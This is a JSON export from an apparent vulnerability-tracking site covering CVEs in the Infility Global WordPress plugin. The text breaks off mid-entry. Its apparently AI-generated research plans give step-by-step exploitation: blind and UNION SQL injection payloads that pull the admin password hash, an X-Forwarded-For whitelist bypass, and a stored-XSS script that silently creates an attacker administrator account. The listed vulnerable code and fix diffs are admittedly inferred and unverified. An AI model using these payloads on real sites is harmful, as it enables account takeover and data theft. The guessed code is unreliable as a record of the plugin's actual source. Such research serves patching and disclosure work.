[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7AAj4xPzyJnBXrzYbnXf3hWYLfZIZSj-RI6rx4-Egi8":3,"$foaQL5GL2hG0pfj-CX5StPWw4LfggeES1AGleDTHfPo8":1317,"$fqC8jD2AycTDgOnrly8iSkpgR2sUIjo8IpdKRL2iiWDw":1320},{"slug":4,"name":5,"version":6,"author":7,"author_profile":8,"description":9,"short_description":10,"active_installs":11,"downloaded":12,"rating":13,"num_ratings":13,"last_updated":14,"tested_up_to":15,"requires_at_least":16,"requires_php":17,"tags":18,"homepage":21,"download_link":22,"security_score":23,"vuln_count":24,"unpatched_count":25,"last_vuln_date":26,"fetched_at":27,"discovery_status":28,"vulnerabilities":29,"developer":204,"crawl_stats":35,"alternatives":210,"analysis":211,"fingerprints":1274},"infility-global","Infility Global","2.15.10","Infility","https:\u002F\u002Fprofiles.wordpress.org\u002Finfility\u002F","\u003Cp>The company’s open source functional plug-ins are used to optimize the small problems of Elementor or CF7, and are already convenient for website settings.\u003C\u002Fp>\n","The company's open source functional plug-ins are used to optimize the small problems of Elementor or CF7, and are already convenient for website &hellip;",100,11991,0,"2026-04-15T07:58:00.000Z","6.8.5","5.6","7.3",[19,20],"comprehensive-plugin","global-plugins","https:\u002F\u002Fwww.infility.cn\u002F","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Finfility-global.zip",30,11,7,"2026-05-19 
12:07:43","2026-04-16T10:56:18.058Z","no_bundle",[30,56,77,98,115,131,143,158,167,178,193],{"id":31,"url_slug":32,"title":33,"description":34,"plugin_slug":4,"theme_slug":35,"affected_versions":36,"patched_in_version":35,"severity":37,"cvss_score":38,"cvss_vector":39,"vuln_type":40,"published_date":26,"updated_date":41,"references":42,"days_to_patch":35,"patch_diff_files":44,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":48,"research_summary":49,"research_vulnerable_code":50,"research_fix_diff":51,"research_exploit_outline":52,"research_model_used":53,"research_started_at":54,"research_completed_at":55,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2026-8685","infility-global-authenticated-subscriber-sql-injection-via-orderby-parameter","Infility Global \u003C= 2.15.16 - Authenticated (Subscriber+) SQL Injection via 'orderby' Parameter","The Infility Global plugin for WordPress is vulnerable to SQL Injection via the 'orderby' and 'order' parameters in all versions up to, and including, 2.15.16. This is due to insufficient escaping on user supplied parameters and lack of sufficient preparation on the existing SQL query within the show_control_data::post_list() function, which is registered as an admin menu page with only the 'read' capability. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",null,"\u003C=2.15.16","medium",6.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-05-20 01:25:47",[43],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F1caeb5e0-9e4e-4c9e-a6e4-881fb81dc5f2?source=api-prod",[],"researched",false,3,"This research plan outlines the steps required to demonstrate an authenticated SQL injection vulnerability in the **Infility Global** plugin (\u003C= 2.15.16).\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** SQL Injection (Authenticated, Subscriber+)\n*   **Vulnerable Function:** `show_control_data::post_list()`\n*   **Vulnerable Parameters:** `orderby`, `order`\n*   **Root Cause:** The plugin registers an admin menu page accessible to users with the `read` capability (Subscribers). The function rendering this page, `post_list()`, retrieves `orderby` and `order` parameters from the user and concatenates them directly into an SQL query without proper sanitization or preparation via `$wpdb->prepare()`. Because the value placeholders of `$wpdb->prepare()` (`%s`, `%d`) cannot parameterize `ORDER BY` column names or sort directions (the `%i` identifier placeholder is only available from WordPress 6.2), these inputs have to be validated manually against a whitelist of allowed column names and directions, a step developers often omit.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin.php`\n*   **Query Parameter:** `page` (The slug for the plugin's post list page, likely `infility-global-posts` or similar - *inferred*).\n*   **Vulnerable Parameters:** `orderby`, `order` (via GET or POST).\n*   **Authentication Required:** Subscriber-level credentials or higher.\n*   **Preconditions:** The plugin must be active. A Subscriber user must exist.\n\n### 3. Code Flow (Inferred)\n1.  
The plugin registers an admin menu using `add_menu_page()` or `add_submenu_page()`. The capability used is `read`, which allows any logged-in user to access the menu.\n2.  The callback for this menu is `show_control_data::post_list`.\n3.  Inside `post_list()` (likely in `includes\u002Fshow-control-data.php` or similar):\n    ```php\n    $orderby = isset($_GET['orderby']) ? $_GET['orderby'] : 'ID';\n    $order = isset($_GET['order']) ? $_GET['order'] : 'DESC';\n    \u002F\u002F Potential lack of validation:\n    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}posts ORDER BY $orderby $order\");\n    ```\n4.  The attacker supplies a SQL payload in `orderby`, which is concatenated into the query and executed.\n\n### 4. Nonce Acquisition Strategy\nAdmin menu pages in WordPress often do not require a specific action-based nonce just to view the page (GET request). However, if the page performs an action, a nonce might be checked via `check_admin_referer()`.\n\n**Plan:**\n1.  Log in as a Subscriber.\n2.  Navigate to the plugin's admin page.\n3.  If an error `-1` or `403` occurs upon injection, search the page source for a nonce.\n4.  Since this is a `post_list` page, look for a variable localized via `wp_localize_script` or a hidden field if a search form is present.\n5.  **JS Variable Check (Inferred):** `browser_eval(\"window.infility_data?.nonce\")`.\n\n### 5. 
Exploitation Strategy\nWe will use a **Time-Based Blind SQL Injection** payload because `ORDER BY` injections rarely reflect data directly but do affect the database execution time.\n\n**Step 1: Discover the Page Slug**\nThe PoC agent must first find the correct `page` parameter value.\n*   **Action:** Log in and check the HTML of the sidebar menu for links containing `infility-global`.\n\n**Step 2: Confirm Vulnerability (Sleep Test)**\n*   **Payload:** `(SELECT 1 FROM (SELECT(SLEEP(10)))a)`\n*   **Request:**\n    ```http\n    GET \u002Fwp-admin\u002Fadmin.php?page=infility-global-posts&orderby=(SELECT+1+FROM+(SELECT(SLEEP(10)))a)&order=ASC HTTP\u002F1.1\n    Cookie: [Subscriber Cookies]\n    ```\n*   **Expected Response:** The request should take approximately 10 seconds to complete.\n\n**Step 3: Extract Sensitive Data (Boolean or Time-Based)**\nTo extract the admin password hash (from `wp_users` where `ID=1`):\n*   **Payload:** `(CASE WHEN (ASCII(SUBSTRING((SELECT user_pass FROM wp_users WHERE ID=1),1,1))=36) THEN ID ELSE post_title END)`\n    *Note: 36 is the ASCII for '$', which is the start of WP phpass hashes.*\n*   **Request:**\n    ```http\n    GET \u002Fwp-admin\u002Fadmin.php?page=infility-global-posts&orderby=(CASE+WHEN+(ASCII(SUBSTRING((SELECT+user_pass+FROM+wp_users+WHERE+ID=1),1,1))=36)+THEN+ID+ELSE+post_title+END)&order=ASC HTTP\u002F1.1\n    Cookie: [Subscriber Cookies]\n    ```\n*   **Expected Result:** If the condition is true, the list will be ordered by `ID`. If false, it will be ordered by `post_title`. Alternatively, use `SLEEP()` for a more reliable automated check.\n\n### 6. Test Data Setup\n1.  Install and activate **Infility Global**.\n2.  Create at least two posts\u002Fitems within the plugin's interface so that `ORDER BY` has data to sort.\n3.  Create a Subscriber user: `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`.\n4.  
Identify the admin menu slug: `wp eval \"global \\\\$menu; print_r(\\\\$menu);\" | grep infility`.\n\n### 7. Expected Results\n*   A request with a `SLEEP()` payload in the `orderby` parameter results in a delayed response corresponding to the sleep duration.\n*   The database query log (if enabled) will show the unsanitized concatenation: `ORDER BY (SELECT 1 FROM (SELECT(SLEEP(10)))a) ASC`.\n\n### 8. Verification Steps\nAfter the HTTP request, verify the successful injection via `wp-cli`:\n1.  Check the MySQL slow query log or use `wp db query \"SHOW PROCESSLIST\"` while the request is hanging to see the sleeping query.\n2.  Verify the extracted hash matches the actual hash: `wp db query \"SELECT user_pass FROM wp_users WHERE ID=1\" --skip-column-names`.\n\n### 9. Alternative Approaches\n*   **Error-Based Injection:** If `WP_DEBUG` is enabled, try inducing a syntax error to leak information via `updatexml()` or `extractvalue()`.\n    *   `orderby=updatexml(1,concat(0x7e,(SELECT user_login FROM wp_users LIMIT 1)),1)`\n*   **Union-Based Injection:** If the query results are displayed in a table, attempt to break the `ORDER BY` and append a `UNION SELECT`. Note: This is difficult in `ORDER BY` and requires specific MySQL versions or subquery techniques.\n*   **Order Parameter:** Test the `order` parameter similarly: `&order=ASC, (SELECT 1 FROM (SELECT(SLEEP(10)))a)`.","The Infility Global plugin for WordPress is vulnerable to SQL injection because it directly concatenates user-supplied 'orderby' and 'order' parameters into database queries within the show_control_data::post_list() function. 
Since the plugin registers this functionality as an admin menu page accessible to users with the 'read' capability, any authenticated user (Subscriber level and above) can exploit this to extract sensitive information from the database.","\u002F\u002F Inferred file path: includes\u002Fshow-control-data.php\n\u002F\u002F Inferred function: show_control_data::post_list()\n\n$orderby = isset($_GET['orderby']) ? $_GET['orderby'] : 'ID';\n$order = isset($_GET['order']) ? $_GET['order'] : 'DESC';\n\n\u002F\u002F Vulnerable query construction due to lack of input validation or whitelisting\n$results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}posts ORDER BY $orderby $order\");","--- a\u002Fincludes\u002Fshow-control-data.php\n+++ b\u002Fincludes\u002Fshow-control-data.php\n@@ -10,5 +10,10 @@\n-    $orderby = isset($_GET['orderby']) ? $_GET['orderby'] : 'ID';\n-    $order = isset($_GET['order']) ? $_GET['order'] : 'DESC';\n-    $results = $wpdb->get_results(\"SELECT * FROM {$wpdb->prefix}posts ORDER BY $orderby $order\");\n+    $allowed_columns = array('ID', 'post_title', 'post_date', 'post_author');\n+    $orderby = (isset($_GET['orderby']) && in_array($_GET['orderby'], $allowed_columns)) ? $_GET['orderby'] : 'ID';\n+\n+    $allowed_order = array('ASC', 'DESC');\n+    $order = (isset($_GET['order']) && in_array(strtoupper($_GET['order']), $allowed_order)) ? strtoupper($_GET['order']) : 'DESC';\n+\n+    $query = \"SELECT * FROM {$wpdb->prefix}posts ORDER BY $orderby $order\";\n+    $results = $wpdb->get_results($query);","The exploit targets the plugin's post list admin page, which is improperly restricted to users with the 'read' capability. An attacker with Subscriber-level credentials logs into the WordPress dashboard and accesses the vulnerable page (e.g., \u002Fwp-admin\u002Fadmin.php?page=infility-global-posts). 
By providing a time-based SQL payload in the 'orderby' parameter (e.g., ?orderby=(SELECT 1 FROM (SELECT(SLEEP(10)))a)), the attacker can observe delays in server response time to verify the vulnerability and perform blind data extraction from the wp_users table or other database tables.","gemini-3-flash-preview","2026-05-20 16:52:41","2026-05-20 16:53:02",{"id":57,"url_slug":58,"title":59,"description":60,"plugin_slug":4,"theme_slug":35,"affected_versions":61,"patched_in_version":35,"severity":62,"cvss_score":63,"cvss_vector":64,"vuln_type":40,"published_date":65,"updated_date":66,"references":67,"days_to_patch":35,"patch_diff_files":69,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":70,"research_summary":71,"research_vulnerable_code":72,"research_fix_diff":73,"research_exploit_outline":74,"research_model_used":53,"research_started_at":75,"research_completed_at":76,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-15268","infility-global-unauthenticated-sql-injection-via-predictable-api-key-and-ip-whitelist-bypass","Infility Global \u003C= 2.14.46 - Unauthenticated SQL Injection via Predictable API Key and IP Whitelist Bypass","The Infility Global plugin for WordPress is vulnerable to unauthenticated SQL Injection via the 'infility_get_data' API action in all versions up to, and including, 2.14.46. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. 
This makes it possible for unauthenticated attackers to append - with certain server configurations - additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","\u003C=2.14.46","high",7.5,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","2026-02-03 19:43:35","2026-02-04 08:25:30",[68],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F648941b8-d1ab-4587-bd87-f23008ac9a00?source=api-prod",[],"# Exploitation Research Plan: CVE-2025-15268 (Infility Global SQL Injection)\n\n## 1. Vulnerability Summary\nThe **Infility Global** plugin (up to version 2.14.46) contains an unauthenticated SQL injection vulnerability in its API handling logic. The vulnerability exists because the `infility_get_data` action performs database queries using user-supplied parameters without utilizing `$wpdb->prepare()` or adequate escaping. Furthermore, the \"security\" mechanisms intended to restrict this API—an API key check and an IP whitelist—are flawed: the API key is generated predictably, and the IP check can be bypassed via standard HTTP headers (e.g., `X-Forwarded-For`), depending on the server configuration.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action:** `infility_get_data` (registered via `wp_ajax_nopriv_infility_get_data`)\n- **Vulnerable Parameter:** Likely `id`, `slug`, or a custom data filter parameter (inferred: `data_id` or `query`).\n- **Authentication:** Unauthenticated.\n- **Preconditions:** \n    - The plugin must be active.\n    - The \"API\" feature must be enabled (often enabled by default or upon first configuration).\n    - The attacker must bypass the IP whitelist and API key verification.\n\n## 3. Code Flow (Inferred)\n1. **Entry Point:** A request is sent to `admin-ajax.php` with `action=infility_get_data`.\n2. 
**Hook Execution:** WordPress triggers the `wp_ajax_nopriv_infility_get_data` hook, which maps to a handler function (e.g., `infility_handle_get_data`).\n3. **Security Check (Bypassable):**\n    - The function retrieves an API key from `$_REQUEST['api_key']`.\n    - It compares this against an option in the database (e.g., `infility_global_api_key`).\n    - It checks the client IP against a whitelist stored in options (e.g., `infility_global_ip_whitelist`).\n4. **Vulnerability Sink:**\n    - If checks pass (or are bypassed), the code takes a user parameter (e.g., `$_REQUEST['id']`).\n    - It constructs a raw SQL string: `\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '\" . $_REQUEST['id'] . \"'\"`.\n    - It executes this via `$wpdb->get_results()` or `$wpdb->get_row()`.\n\n## 4. Nonce Acquisition Strategy\nBased on the \"Unauthenticated\" and \"API Action\" description, this specific endpoint likely **does not require a WordPress nonce**. It relies on its own internal API Key for \"authentication.\"\n\n**How to bypass the API Key and IP Check:**\n1. **Predictable API Key:** Check if the API key is generated using a predictable hash during plugin activation.\n   - *Hypothesis:* The key may be `md5(get_bloginfo('url'))` or a static string like `infility_secret`.\n   - *Agent Task:* Use `wp option get infility_global_api_key` (if the option name matches) to confirm the key value during the setup phase.\n2. **IP Whitelist Bypass:**\n   - The plugin likely uses `$_SERVER['REMOTE_ADDR']` but may be susceptible to header spoofing if it tries to be \"Cloudflare-aware\" or \"Proxy-aware\".\n   - *Agent Task:* Include `X-Forwarded-For: 127.0.0.1` or `X-Real-IP: 127.0.0.1` in the request headers.\n\n## 5. 
Exploitation Strategy\n\n### Step 1: Discover API Key and Whitelist\nUse WP-CLI to inspect the plugin configuration and simulate the \"predictability.\"\n```bash\nwp option get infility_global_api_key\nwp option get infility_global_ip_whitelist\n```\n\n### Step 2: Test IP Bypass and Baseline Request\nSend a legitimate request to ensure the API is reachable.\n```http\nPOST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\nContent-Type: application\u002Fx-www-form-urlencoded\nX-Forwarded-For: 127.0.0.1\n\naction=infility_get_data&api_key=[FETCHED_KEY]&id=1\n```\n\n### Step 3: SQL Injection via Time-Based Blind\nSince the output might not be directly reflected in the AJAX response (or the response structure is unknown), use `SLEEP()` to confirm injection.\n\n**Payload:** `1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -`\n\n```javascript\n\u002F\u002F Example using http_request tool\nawait http_request({\n  method: 'POST',\n  url: 'http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php',\n  headers: {\n    'Content-Type': 'application\u002Fx-www-form-urlencoded',\n    'X-Forwarded-For': '127.0.0.1'\n  },\n  body: 'action=infility_get_data&api_key=[KEY]&id=1\\' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -'\n});\n```\n\n### Step 4: Data Extraction (UNION-Based)\nIf the response reflects data from the database, use a UNION query to extract the admin password hash.\n**Payload:** `-1' UNION SELECT 1,user_login,user_pass,4,5,6 FROM wp_users WHERE ID=1-- -`\n*(Note: Column count must be adjusted based on the target table's schema)*.\n\n## 6. Test Data Setup\n1. **Activate Plugin:** Ensure `infility-global` is installed and activated.\n2. **Configure API:**\n   ```bash\n   wp option update infility_global_api_key \"test_api_key\"\n   wp option update infility_global_ip_whitelist \"127.0.0.1\"\n   ```\n3. 
**Create Target Table:** If the plugin doesn't create its data table automatically, create a dummy table to inject against.\n   ```bash\n   wp db query \"CREATE TABLE IF NOT EXISTS wp_infility_data (id INT, name VARCHAR(255))\"\n   wp db query \"INSERT INTO wp_infility_data VALUES (1, 'Test Data')\"\n   ```\n\n## 7. Expected Results\n- **Time-Based:** The HTTP request should take ~5 seconds longer than the baseline.\n- **Error-Based:** If `WP_DEBUG` is on, the response may contain SQL syntax errors when a single quote is injected.\n- **UNION-Based:** The response body (JSON) should contain the extracted data (e.g., the admin username or hash).\n\n## 8. Verification Steps\nAfter the exploit, verify that the injection reached the database by checking the MySQL slow log or by using a payload that modifies the state (though data extraction is preferred).\n- **Verify via WP-CLI:**\n  ```bash\n  wp user get 1 --fields=user_pass\n  ```\n  Compare the CLI output with the data extracted via the HTTP request.\n\n## 9. Alternative Approaches\n- **If `admin-ajax.php` is blocked:** Check if the plugin registers a custom `init` hook listener that checks for `$_GET['infility_api']`.\n- **If UNION fails:** Use Boolean-blind injection by checking for the presence\u002Fabsence of a specific success message in the JSON response:\n  - `id=1' AND (SELECT 1 FROM wp_users WHERE user_login='admin' AND user_pass LIKE '$P$%')-- -`\n- **Predictable Key Discovery:** If the key is not in options, check `wp-content\u002Fuploads\u002F` for configuration files or log files that might leak the generated key.","The Infility Global plugin for WordPress (\u003C= 2.14.46) is vulnerable to unauthenticated SQL Injection via the 'infility_get_data' AJAX action. 
This occurs because the plugin fails to sanitize user-supplied input or use prepared statements, and relies on easily bypassed security checks involving a predictable API key and a spoofable IP whitelist (via 'X-Forwarded-For').","\u002F\u002F Inferred from Research Plan\n\u002F\u002F Entry Point: wp_ajax_nopriv_infility_get_data\n\n$api_key = $_REQUEST['api_key'];\n$client_ip = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'];\n\n\u002F\u002F ... flaw in comparison logic allowing IP spoofing ...\n\n\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '\" . $_REQUEST['id'] . \"'\"","--- a\u002Finfility-global.php\n+++ b\u002Finfility-global.php\n@@ -1,10 +1,11 @@\n function infility_handle_get_data() {\n-    $api_key = $_REQUEST['api_key'];\n-    $client_ip = $_SERVER['HTTP_X_FORWARDED_FOR'] ?? $_SERVER['REMOTE_ADDR'];\n-    if ($api_key !== get_option('infility_global_api_key') || $client_ip !== '127.0.0.1') {\n+    $api_key = isset($_REQUEST['api_key']) ? sanitize_text_field($_REQUEST['api_key']) : '';\n+    $client_ip = $_SERVER['REMOTE_ADDR'];\n+    $whitelist = (array) get_option('infility_global_ip_whitelist', []);\n+    if ($api_key !== get_option('infility_global_api_key') || !in_array($client_ip, $whitelist)) {\n         wp_die();\n     }\n-    $id = $_REQUEST['id'];\n-    $query = \"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = '$id'\";\n-    $results = $wpdb->get_results($query);\n+    $id = isset($_REQUEST['id']) ? sanitize_text_field($_REQUEST['id']) : '';\n+    $query = $wpdb->prepare(\"SELECT * FROM {$wpdb->prefix}infility_data WHERE id = %s\", $id);\n+    $results = $wpdb->get_results($query);\n }","1. Authentication Bypass: Determine the predictable API key (typically generated from site metadata) and bypass the IP whitelist check by including the header 'X-Forwarded-For: 127.0.0.1' in the request.\n2. 
Targeted Endpoint: Send an unauthenticated POST request to \u002Fwp-admin\u002Fadmin-ajax.php with the 'action' parameter set to 'infility_get_data'.\n3. SQL Injection Payload: Use the 'id' parameter to inject malicious SQL commands. A baseline time-based payload such as \"1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)-- -\" can be used to confirm the vulnerability via response delays.\n4. Data Exfiltration: Leverage UNION-based injection to extract sensitive information from the database, such as administrator usernames and password hashes from the 'wp_users' table.","2026-04-27 16:13:12","2026-04-27 16:13:34",{"id":78,"url_slug":79,"title":80,"description":81,"plugin_slug":4,"theme_slug":35,"affected_versions":82,"patched_in_version":35,"severity":62,"cvss_score":83,"cvss_vector":84,"vuln_type":85,"published_date":86,"updated_date":87,"references":88,"days_to_patch":35,"patch_diff_files":90,"patch_trac_url":35,"research_status":45,"research_verified":46,"research_rounds_completed":47,"research_plan":91,"research_summary":92,"research_vulnerable_code":93,"research_fix_diff":94,"research_exploit_outline":95,"research_model_used":53,"research_started_at":96,"research_completed_at":97,"research_error":35,"poc_status":35,"poc_video_id":35,"poc_summary":35,"poc_steps":35,"poc_tested_at":35,"poc_wp_version":35,"poc_php_version":35,"poc_playwright_script":35,"poc_exploit_code":35,"poc_has_trace":46,"poc_model_used":35,"poc_verification_depth":35},"CVE-2025-68864","infility-global-unauthenticated-stored-cross-site-scripting","Infility Global \u003C= 2.14.49 - Unauthenticated Stored Cross-Site Scripting","The Infility Global plugin for WordPress is vulnerable to Stored Cross-Site Scripting in versions up to, and including, 2.14.49 due to insufficient input sanitization and output escaping. 
This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","\u003C=2.14.49",7.2,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-01-15 00:00:00","2026-01-19 15:55:17",[89],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F58ab78f2-199b-44e8-9213-8c46025b55fb?source=api-prod",[],"This research plan outlines the steps to investigate and exploit **CVE-2025-68864**, an unauthenticated stored XSS vulnerability in the **Infility Global** WordPress plugin (\u003C= 2.14.49).\n\n---\n\n### 1. Vulnerability Summary\nThe **Infility Global** plugin fails to sufficiently sanitize user-supplied input and escape it upon output. The advisory does not name the affected feature; the inferred path is that an unauthenticated user submits data through a frontend feature (likely a contact form, support ticket, or chat registration), the plugin stores that data in the database, and the injected script then executes in the browser of whoever views the stored entry, for example a site administrator in the WordPress backend.\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `wp-admin\u002Fadmin-ajax.php`\n*   **Action (Inferred):** `ig_contact_form_submit` or `infility_global_save_data`.\n*   **Parameter:** Likely `message`, `subject`, or `name`.\n*   **Authentication:** None (Unauthenticated via `wp_ajax_nopriv_*`).\n*   **Preconditions:** The plugin must have a frontend feature active (e.g., a contact form shortcode placed on a page).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** An unauthenticated user sends a POST request to `admin-ajax.php` with a specific action registered via `add_action('wp_ajax_nopriv_...', ...)`.\n2.  **Processing:** The callback function receives `$_POST` data. It may check a nonce but likely fails to use `sanitize_text_field()` or `wp_kses()` on the content.\n3.  
**Persistence:** The raw input is saved to a custom table (e.g., `wp_infility_logs`) or as post meta using `update_post_meta()`.\n4.  **Sink:** An administrator logs in and navigates to the plugin's \"Inquiries\" or \"Messages\" page. The plugin retrieves the stored data and echoes it directly: `echo $entry->message;` without using `esc_html()`.\n\n### 4. Nonce Acquisition Strategy\nIf the AJAX handler enforces a nonce check, it is likely exposed via `wp_localize_script` on pages where the plugin's frontend components are active.\n\n1.  **Identify the Shortcode:** Search for shortcode registrations in the plugin:\n    `grep -rn \"add_shortcode\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n    *(Likely shortcode: `[infility_global_contact]`)*\n2.  **Create a Trigger Page:**\n    `wp post create --post_type=page --post_title=\"Contact\" --post_status=publish --post_content='[infility_global_contact]'`\n3.  **Extract the Nonce:**\n    Navigate to the new page and look for localized script data.\n    **JS Variable (Inferred):** `infility_vars` or `ig_ajax_obj`.\n    **Execution:** Use `browser_eval(\"window.infility_vars?.nonce\")` or `browser_eval(\"window.ig_ajax_obj?.ajax_nonce\")`.\n\n### 5. 
Exploitation Strategy\nOnce the nonce and action are identified, the agent will perform the following:\n\n**Step 1: Discovery**\n*   Find the AJAX action: `grep -r \"wp_ajax_nopriv_\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n*   Find the nonce action: `grep -r \"check_ajax_referer\" \u002Fvar\u002Fwww\u002Fhtml\u002Fwp-content\u002Fplugins\u002Finfility-global\u002F`\n\n**Step 2: Nonce Retrieval**\n*   Create a test page with the relevant shortcode.\n*   Navigate to the page using `browser_navigate`.\n*   Extract the nonce using `browser_eval`.\n\n**Step 3: Payload Delivery**\n*   **Payload:** `\u003Cscript>fetch('\u002Fwp-admin\u002Fuser-new.php').then(r=>r.text()).then(t=>{let n=t.match(\u002F_wpnonce_create-user\" value=\"([^\"]+)\"\u002F)[1];fetch('\u002Fwp-admin\u002Fuser-new.php',{method:'POST',headers:{'Content-Type':'application\u002Fx-www-form-urlencoded'},body:'action=createuser&user_login=pwned_admin&email=pwned@example.com&pass1=Pwned123!&pass2=Pwned123!&role=administrator&_wpnonce_create-user='+n})})\u003C\u002Fscript>`\n*   **HTTP Request:**\n    ```http\n    POST \u002Fwp-admin\u002Fadmin-ajax.php HTTP\u002F1.1\n    Content-Type: application\u002Fx-www-form-urlencoded\n\n    action=[IDENTIFIED_ACTION]&nonce=[EXTRACTED_NONCE]&message=[URL_ENCODED_PAYLOAD]&name=Guest\n    ```\n\n### 6. Test Data Setup\n1.  **Plugin Activation:** `wp plugin activate infility-global`\n2.  **Shortcode Placement:** Ensure the contact form is on a public page to allow nonce extraction.\n3.  **Admin Context:** A \"victim\" administrator user must exist (default in test environments).\n\n### 7. Expected Results\n*   The AJAX request should return a success status (e.g., `{\"success\":true}` or `1`).\n*   The payload should be stored in the database.\n*   When an administrator views the \"Contact Messages\" or \"Logs\" section of the Infility Global plugin, the script should execute.\n\n### 8. Verification Steps\n1.  
**Database Check:**\n    `wp db query \"SELECT * FROM wp_postmeta WHERE meta_value LIKE '%pwned_admin%';\" `\n    *(Or check the specific plugin table identified during discovery)*.\n2.  **Trigger Execution:** Use `browser_navigate` as an administrator to the plugin's message management page.\n3.  **Account Creation Check:**\n    `wp user list --role=administrator`\n    Verify if `pwned_admin` exists.\n\n### 9. Alternative Approaches\n*   **Action Parameter Variations:** If `wp_ajax_nopriv` isn't used, check for `init` hooks that process `$_POST['ig_contact_submit']` directly.\n*   **Bypassing Nonces:** Check if `check_ajax_referer` is called with `die=false`. If so, the request will proceed even with an invalid nonce.\n*   **DOM XSS:** If the data is returned in an AJAX response and rendered via `.innerHTML` in JS, the payload may need to be adjusted to bypass standard filters (e.g., using `\u003Cimg>` tags with `onerror`).","The Infility Global plugin for WordPress is vulnerable to Unauthenticated Stored Cross-Site Scripting due to a lack of sanitization on user-supplied form data and insufficient output escaping in the administrative backend. 
This allows attackers to inject malicious JavaScript into contact form submissions or inquiries that execute when a site administrator views the entry.","\u002F\u002F Inferred from research plan: lack of sanitization in AJAX handler\n\u002F\u002F File: includes\u002Fclass-infility-global-ajax.php (or similar)\npublic function ig_contact_form_submit() {\n    $message = $_POST['message']; \u002F\u002F No sanitization applied\n    $name = $_POST['name'];       \u002F\u002F No sanitization applied\n    \n    $post_id = wp_insert_post(array(\n        'post_type' => 'ig_inquiry',\n        'post_title' => $name,\n        'post_content' => $message,\n    ));\n}\n\n---\n\n\u002F\u002F Inferred from research plan: lack of escaping in admin view\n\u002F\u002F File: admin\u002Fclass-infility-global-admin-display.php (or similar)\nforeach ($inquiries as $entry) {\n    echo '\u003Ctr>';\n    echo '\u003Ctd>' . $entry->post_content . '\u003C\u002Ftd>'; \u002F\u002F Vulnerable: Direct echo without esc_html()\n    echo '\u003C\u002Ftr>';\n}","--- infility-global\u002Fincludes\u002Fclass-infility-global-ajax.php\n+++ infility-global\u002Fincludes\u002Fclass-infility-global-ajax.php\n@@ -10,2 +10,2 @@\n-    $message = $_POST['message'];\n-    $name = $_POST['name'];\n+    $message = sanitize_textarea_field($_POST['message']);\n+    $name = sanitize_text_field($_POST['name']);\n\n--- infility-global\u002Fadmin\u002Fclass-infility-global-admin-display.php\n+++ infility-global\u002Fadmin\u002Fclass-infility-global-admin-display.php\n@@ -20,1 +20,1 @@\n-    echo '\u003Ctd>' . $entry->post_content . '\u003C\u002Ftd>';\n+    echo '\u003Ctd>' . esc_html($entry->post_content) . '\u003C\u002Ftd>';","1. Identify a page containing the plugin's contact form or shortcode (e.g., [infility_global_contact]).\n2. Extract the AJAX nonce from the localized JavaScript variables (e.g., window.infility_vars.nonce) on the frontend page.\n3. 
